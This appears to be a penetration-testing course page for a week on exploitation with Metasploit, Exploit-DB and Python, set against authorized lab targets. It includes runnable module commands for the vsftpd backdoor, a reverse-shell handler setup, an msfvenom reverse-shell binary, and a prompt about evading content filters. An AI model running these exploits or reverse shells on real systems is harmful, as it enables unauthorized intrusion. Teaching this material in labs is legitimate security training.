Classroom Glossary Public page

Week 7: Exploitation I (Metasploit, Public Exploits, Manual Techniques)

1,516 words

Weidman writes: "Some say pentests truly begin only after exploitation, in the post-exploitation phase." They are not wrong, but they are starting from a point where exploitation has already succeeded. Week 7 teaches how to get there: selecting the right tool, understanding what the exploit does before you run it, and documenting the evidence chain a client report requires.

Reading (~1.5 hr)

Required:

  • Weidman, Penetration Testing, Chapter 8 ("Exploitation"), all sections. ~25 pages. Covers Metasploit payloads (staged vs. stageless, bind vs. reverse shells, Meterpreter), exploitation with public exploits (SLMail buffer overflow), default credentials, and WebDAV. Read each exploit section; you will replicate some of them in lab.
  • Weidman, Penetration Testing, Chapter 4 ("Using the Metasploit Framework"), Module database, payloads, msfvenom. ~20 pages. Read before lecture so you arrive knowing how to find and configure a module.

Supplementary:

  • Exploit-DB (exploit-db.com). Not a reading assignment but a tool you will use this week. Search for CVEs from your Lab 5 spreadsheet. Note the format of exploit-db entries: exploit author, tested versions, affected components, the exploit code itself.
  • Metasploit Unleashed (offensive-security.com/metasploit-unleashed/). The free OffSec reference for Metasploit. Read the "Exploiting Vulnerabilities" and "Payloads" chapters.

Lecture outline (~1 hr)

Part 1: Three tool families, and when to use each (20 min)

Exploitation tools fall into three families. Professional practitioners use all three; leaning exclusively on Metasploit is a skill deficit that becomes apparent quickly.

Family 1: Metasploit Framework

Metasploit is a structured exploit framework with a module database, payload generation, session management, and post-exploitation capabilities. It is the right tool when:

  • A tested, reliable module exists for the target CVE
  • You need session management (multiple shells from a single run)
  • The engagement allows automated tool use (some client ROEs restrict Metasploit)
  • You need to chain exploitation → post-exploitation → pivoting in a single framework

When not to use Metasploit exclusively:

  • When you need to demonstrate understanding of the vulnerability, not just execution of a module
  • When the target's configuration differs slightly from the module's tested conditions (manual exploitation catches this; Metasploit fails silently)
  • When OSCP-style assessment conditions apply (OSCP limits Metasploit to one machine)
msfconsole
# search for a module:
msf6 > search vsftpd
# use a module:
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 exploit(vsftpd_234_backdoor) > show options
msf6 exploit(vsftpd_234_backdoor) > set RHOSTS 192.168.100.20
msf6 exploit(vsftpd_234_backdoor) > run

Family 2: Public exploit code (Exploit-DB, GitHub, searchsploit)

When no Metasploit module exists or you need a manual approach, public exploit code is the starting point. The workflow:

# Search for exploits locally (Kali includes searchsploit):
searchsploit vsftpd 2.3.4
searchsploit -m <exploit-id>  # copy exploit to current directory

Read the exploit source before running it. For every public exploit in this course, you must:

  1. Identify what the exploit does at the network/system level (what packets it sends, what command it injects, what memory it overwrites)
  2. Identify the CVE and look it up in NVD
  3. Understand what a successful vs. unsuccessful run looks like so you can diagnose failures

Family 3: Custom Python scripting

When the target has a simple vulnerability (command injection, credential stuffing, default password) or when no public exploit matches the exact version, custom Python tooling closes the gap. Week 7 exercises include one Python-written exploit from scratch.

Part 2: Payload selection (20 min)

In Metasploit, the exploit gets you code execution on the target. The payload is what runs after that: what the shell does, and how it communicates back to you.

Staged vs. inline payloads:

  • Staged (windows/x64/meterpreter/reverse_tcp): Small first-stage stager is sent; stager calls back and downloads the full payload. Smaller initial delivery; requires two-stage network connection.
  • Inline/stageless (windows/x64/meterpreter_reverse_tcp): Full payload delivered in one piece. Larger; more reliable in restricted-bandwidth or filtered environments.

Bind vs. reverse shells:

  • Bind shell: Payload opens a listening port on the target; attacker connects to target:port. Works if attacker can reach the target directly.
  • Reverse shell: Payload connects back to the attacker's IP:port. Works through NAT or when the target's firewall blocks inbound connections but allows outbound. The more common choice in modern environments.
# Set reverse shell listener in Metasploit:
msf6 > use exploit/multi/handler
msf6 > set PAYLOAD linux/x64/meterpreter/reverse_tcp
msf6 > set LHOST 192.168.100.5  # your Kali IP
msf6 > set LPORT 4444
msf6 > run -j  # run as background job

Meterpreter: Metasploit's feature-rich payload. Runs in memory on the target (no file written to disk). Provides:

  • File system navigation (ls, download, upload)
  • System information (sysinfo, getuid, ps)
  • Network enumeration (route, arp, portfwd)
  • Post-exploitation modules (load kiwi for credential dumping on Windows; getsystem for privilege escalation)

Part 3: Evidence preservation during exploitation (20 min)

Exploitation without evidence is a finding you cannot report. Before running any exploit, ensure:

  1. Terminal session is logged: script -a lab-07-session.log
  2. Nmap pre-scan is saved: The -oA flag saves XML, grepable, and normal formats. The capstone grader will check that your finding's claimed service version matches your scan output.
  3. Screenshot at the key moment: The shell prompt on the target, showing the hostname and privilege level (id, whoami), is the proof-of-exploitation screenshot. Every exploit in Lab 7 requires this screenshot.

For a Metasploit session, the sysinfo and getuid commands together provide the proof:

meterpreter > sysinfo
Computer        : METASPLOITABLE
OS              : Linux 2.6.24-16-server (i386)
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0

This is what you paste into the evidence appendix.

Lab 7: Exploitation I (~5 hr, graded)

See labs/lab-7-exploitation-i.md for the full lab.

Targets: Metasploitable 2 (primary) + at least one retired HTB machine via VPN (if HTB access is available) + DVWA.

Authorization note: All targets are authorized practice ranges. Metasploitable 2 runs locally. HTB machines are accessed via the HTB platform VPN under the platform's authorization. Do not apply these techniques to any other target.

Required exploits (minimum three distinct hosts):

Metasploitable 2 exercises:

  1. vsftpd 2.3.4 backdoor (CVE-2011-2523): This is a deliberately backdoored FTP daemon included in Metasploitable. A Metasploit module (exploit/unix/ftp/vsftpd_234_backdoor) exploits it. Run the module. Then look at the exploit source (searchsploit -m 17491; the exploit-db entry) and describe in your lab report what the backdoor does at the network level. Why does the exploit work without authentication?

  2. UnrealIRCd 3.2.8.1 backdoor (CVE-2010-2075): Another backdoor in Metasploitable. Module: exploit/unix/irc/unreal_ircd_3281_backdoor. Same exercise: run the module, then read the exploit source, then describe the backdoor mechanism.

  3. Samba "username map script" (CVE-2007-2447): Module: exploit/multi/samba/usermap_script. This is a command injection in an old Samba feature. Run the module. Then describe in one paragraph what "command injection" means at the operating-system level and why the Samba parameter was the injection point.

Manual exploit exercise (Python required):

  1. FTP anonymous login + privilege exploration: Metasploitable 2 has FTP anonymous login enabled. Write a Python script that:
    • Connects to Metasploitable 2 on port 21
    • Logs in as anonymous with any email as the password
    • Lists the files in the root FTP directory
    • Downloads one file and saves it locally This is not a CVE exploit; it is a misconfiguration finding. The script should be 15-25 lines of Python using the ftplib standard library. Document: what data was accessible? What is the business impact?

Deliverable: A lab report with one section per exploit, containing: the CVE (if applicable), the Metasploit module name or exploit source, the key commands run, the proof-of-exploitation screenshot (sysinfo + getuid or equivalent), and a one-paragraph description of what the exploit does at the vulnerability level.

Independent practice (~3 hr)

  • Retired HTB machine (2 hr): If HTB access is available, select a retired Linux machine rated "Easy" and work it from initial recon through root. Document the kill chain (initial foothold → privilege escalation) as a two-paragraph finding write-up in the format Week 5 established.
  • msfvenom exploration (0.5 hr): msfvenom generates standalone payloads (not tied to a Metasploit session). Generate a Linux reverse shell as a standalone ELF binary:
    msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.100.5 LPORT=9001 -f elf -o rev_shell
    Note the binary size. How does a staged payload change the size? What does this imply for evading size-based content filters?
  • Reflection (0.5 hr): Write the reflection prompts below.

Reflection prompts

  1. The vsftpd 2.3.4 backdoor was introduced by an unknown attacker who compromised the vsftpd project's download server in 2011. It is present in the source tarball but not the official git repository. What does this tell you about the security of the software supply chain? How would a blue team detect that the installed vsftpd binary contains this backdoor, even if they never look at the source code?

  2. Metasploit's exploit/multi/samba/usermap_script exploit targets a feature that was used by almost nobody and that exposed command injection in its normal operation. The feature was enabled by default. What does "enabled by default" imply for the scope of a finding that exploits a default-on feature? How does this compare to a finding that requires a non-default configuration?

  3. You ran all three Metasploit exploits against Metasploitable 2 successfully. An OSCP exam scenario does not allow Metasploit for this machine. What would you do differently? Walk through the steps you would take to exploit the vsftpd backdoor manually (using nc or Python socket directly) without Metasploit.

Toolchain Diary: Week 7 additions

  • Metasploit Framework (msfconsole) -- Exploit framework, session manager, post-exploitation toolkit. First canonical PEN-track introduction. The discipline of choosing between Metasploit, public exploit code, and manual Python is a practitioner-level skill the course explicitly builds.
  • msfvenom -- Metasploit's payload generator. Produces standalone binaries, shellcode, scripts, and web shells in dozens of formats. Run msfvenom -l payloads to see the full list.
  • searchsploit -- Local search for Exploit-DB's archive. Run sudo searchsploit --update before each lab. Source at exploit-db.com.
  • ftplib (Python standard library) -- Python's built-in FTP client. Week 7's manual exploit exercise uses it; the same pattern appears in Black Hat Python ch. 2.

What's next

Week 8 is web-application exploitation: SQL injection, XSS, SSRF, IDOR, file upload, deserialization. The attack surface map from Lab 4 and the vulnerability identification from Lab 5 point to the specific injection points this week's attacks target. WAHH chapters on SQL injection are required reading.